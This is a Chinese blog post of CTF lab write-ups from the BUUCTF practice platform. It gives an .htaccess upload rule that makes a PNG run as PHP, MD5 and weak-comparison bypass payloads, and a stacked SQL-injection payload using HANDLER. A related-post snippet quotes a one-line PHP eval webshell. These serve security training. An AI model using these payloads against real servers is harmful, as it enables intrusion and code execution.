BUUctf刷题第五天

最新推荐文章于 2025-02-04 17:11:54 发布

盖世大宝剑a

最新推荐文章于 2025-02-04 17:11:54 发布

阅读量253

点赞数 1

本文链接：https://blog.youkuaiyun.com/jie_a/article/details/118077763

版权

每天坚持，绝对不能给自己找借口
加油！

[网鼎杯 2018]Fakebook

这题有一点ssrf，明天再看

[MRCTF2020]你传你🐎呢

.htaccess的文件上传
和上传.user.ini方式差不多
.htaceess的内容为

<FilesMatch "a.png">
SetHandler application/x-httpd-php
</FilesMatch>

解析一个a.png，当做php解析
再上传a.png即可
在这里插入图片描述
地址也给了蚁剑直接连
收工

[MRCTF2020]Ez_bypass

在这里插入图片描述

这道题就更简单了
首先绕过md5等于md5,参数还得不相同
用数组绕过，md5解析不了数组
false=false&id[]=1!=gg[]=2
大概就是这个意思
然后让passwd不等于数字还得等于1234567
用php弱比较1234567a即可
payload:
get:?id[]=1&gg[]=2
post:passwd=1234567a
flag就出来了

[GYCTF2020]Blacklist

是个sql注入，好像是堆叠注入
在这里插入图片描述
首先1’;show tables #

有过滤，老方法用不了了
这里我们用到handler这个东西
HANDLER … OPEN语句打开一个表，使其可以使用后续HANDLER … READ语句访问，该表对象未被其他会话共享，并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭
payload:

1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#

大概懂这个意思了，我觉得能想出来这个的，真的nb

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

盖世大宝剑a

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

BUUCTF刷题——MISC部分（1-20题）

jsdhwdmaz78的博客

10-27

1484

练题网站：https://buuoj.cn/

BUUCTF刷题第二周

Qianzshuo的博客

10-04

1062

第二周wireshakeasycap另一个世界被劫持的神秘礼物数据包中的线索 wireshak 题目给了提示，将下载的pcap丢到wireshark里面，发现查看得到flag easycap 打开压缩包发现是一个pcap，丢到wireshark中，追踪第一个包，直接得到flag 另一个世界用winhex查看，发现最后有一串二进制，将其转换成ascii 被劫持的神秘礼物 pcapng文件，用wireshark打开，查看http包，根据提示将账号密码连接起来，然后md5加密数据包中的线索用 wires

参与评论您还未登录，请先登录后发表或查看评论

BUUCTF之[MRCTF2020]你传你呢1

weixin_66294723的博客

10-12

1733

很明显是文件上传漏洞，通过🐎可知应该是要传一个马进去，一开始把自己制作的图片马传进去后自己的图片马不行，content-type也没问题后上网找wp发现如果一系列%00，改大小写，图片马之类都不行的话，或者上传之后但是菜刀连接不了，回显显示没有数据的话，就代表要改配置文件。

【BUUCTF之[MRCTF2020]你传你呢 1】

qq_40646572的博客

10-25

6029

首先，正常上传图片文件，竟然因为文件大小的问题，上传失败，就挺难受。不过还好，总算知道是什么原因不能上传。总体来讲，这道题，难度是可以的，需要一步步的进行尝试。

BUU15 [MRCTF2020]你传你[特殊字符]呢1

最新发布

2401_86190146的博客

02-04

288

4、.htaccess绕过，只要有这个配置文件，并且内容为“AddType application/x-httpd-php .jpg(就是把所以jpg后缀的文件全都当作php文件来执行)”10、双拼绕过，抓包修改后缀，并在把后缀改成pphphp，这样后端去掉php，还剩下个p和hp组合在一起，又是php。9、文件流绕过，前提条件，必须是window的服务器，抓包修改后缀，并在后缀后面加上::$DATA,8、点绕过，抓包修改后缀，在后缀后面加上点(删掉空格还可以. .或者 . )

[MRCTF2020]你传你呢 1--详细解析

m0_56019217的博客

11-14

1900

学到了新的配置文件：.htaccess文件，在之后面对Apache环境的文件上传漏洞时又多了一种应对手段。

[MRCTF2020]你传你呢

pakho_C的博客

02-09

2357

web第26题 [MRCTF2020]你传你????呢打开靶场应该是一个文件上传的题目首先尝试上传普通图片上传成功并且返回路径上传一句话木马尝试显然做了限制尝试绕过看来php3,php5,ptml等都做了限制尝试图片文件欺骗，这里的后缀是php 依旧失败尝试上传写码后的gif文件失败。看来对文件内容也做了校验我又返回去看了一下以前做的upload-labs靶场的绕过文件上传漏洞–upload-labs靶场复现(4-7关) 参考第6关和第7关的思路尝试使用空格和.绕过

[MRCTF2020]你传你呢 1

qq_43618536的博客

07-03

1330

BUUCTF的[MRCTF2020]你传你🐎呢 1

buuctf刷题记录

mackilo的博客

02-16

3033

2022-1-16 reverse2 扔到IDA64里解析， F5生成伪代码通过分析得出经过一定的变换后与flag进行比较的查看flag的值，是{hacking_for_fun} 再返回前面看如何对flag进行变换的，将105、114、49转换成值，箭头所指的函数功能为，把flag中存在的’i’以及’r’转换成’1’，进而得出正确flag。 2022-1-17 内涵的软件下载好以后发现是乱码的exe文件，拖到ExeinfoPE里查看信息，没有加壳，用IDA打开，查看main函数可以看到跳

buuctf刷题

qq_41788704的博客

10-28

2115

buuctf刷题BJDCTF2020 Easy MD5网鼎杯 2020 青龙组 AreUSerialzGYCTF2020 Blacklist强网杯 2019 随便注 BJDCTF2020 Easy MD5 进来就是一个输入框，发包查看返回信息可以看到SQL语句。这里猜想MD5出来的值会不会可以可以这样利用 select * from ‘admin’ where password=’‘or’1’ 这段PHP代码可以找到MD5出来的值类似于 '‘or’1…’ <?php for ($i = 0;;)

【buusql】[MRCTF2020]你传你呢 1

katniss688的博客

06-28

743

而后门的具体位置虽然就在/var/www/html/upload/d3cf55c760ac2bb268b0c6e6072c610a/ccrequest.png这个文件里，但我们还需要定位到我们的网页index.php储存在html这个文件夹里，所以说，后门的url就是网页url/upload/xxxxxxxxxxxxxx/xx.png。copy:将文件复制或者是合并，/b的意思是以前边图片二进制格式为主，进行合并，合并后的文件依旧是二进制文件，实用于图像/声音等二进制文件。首先，准备一个一句话木马。

[MRCTF2020]你传你呢1

:-)

03-31

1713

[MRCTF2020]你传你????呢1 STEP1：尝试改写文件头和和文件内容显示：判断可能与user.ini或.htaccess文件有关 STEP2：上传.htaccess文件显示：上传成功，上传一个1.png文件 STEP3：上传1.png文件包含一句木马显示： STEP4：蚁剑连接显示：得到flag ...

BUUCTF之[MRCTF2020]你传你呢-------文件解析漏洞

weixin_44632787的博客

06-19

9689

BUUCTF之[MRCTF2020]你传你????呢虽然这题对于大佬来说是属于简单题。但是对于我这种小白来说却是第一次见。算是学到东西了。所以在此记录一下，以后看到这种类似的题目也可以回来复习。。。首先，启动挑战的项目 emmmmmmm这个页面很有个性。。。一开始以为只是个简单的文件上传漏洞，结果没做出来。不管怎么样，先上传一句话木马。并且将下面的内容保存成文件1.png GIF89a? <script language="php">eval($_POST['zyh']);</s

（.htaccess文件特性）[MRCTF2020]你传你呢 1

m0_73734159的博客

11-14

1455

概述来说，htaccess文件是Apache服务器中的一个配置文件，它负责相关目录下的网页配置。通过htaccess文件，可以帮我们实现:网页。通过 application/x-php内容类型，可以看出被识别出是PHP文件，猜测作者使用了htaccess文件更改了相关配置。到这里我们的一句话木马并没有被识别出来，或者说并没有执行，猜测被拦截。可以把这段代码理解为，将1.jpg文件内容当作PHP文件执行。尝试上传更改后的.htaccess文件。.htaccess文件上传成功。上传.htaccess文件。

BUUCTF——[MRCTF2020]你传你呢 1

weixin_45864041的博客

09-28

1369

先传php文件格式的一句话木马。上传失败。那就先传jpg文件发现上传成功。然后我们可以先把路径保存下来。接下来我们再试一下可不可以通过抓包修改的方式上传php文件。发现上传失败。然后，我们又得变换思路了。上一篇文章，我们知道目录下有一个index.php文件，然后我们通过上传.user.ini文件让图片被当做php文件解析。接下来我想到一个思路，那就是.htaccess文件。.htaccess文件可以用来留后门和针对黑名单绕过，可以在.htaccess 加入php解析规则，就能够使上传的jpg/.

buuctf刷题web

01-17

### BUUCTF Web 类型题目刷题练习 #### 网站源码备份文件泄露和PHP反序列化在BUUCTF平台上，有一道涉及网站源码备份文件泄露和PHP反序列化的题目。这类题目通常要求参赛者找到并利用服务器上存在的`.bak`或其他...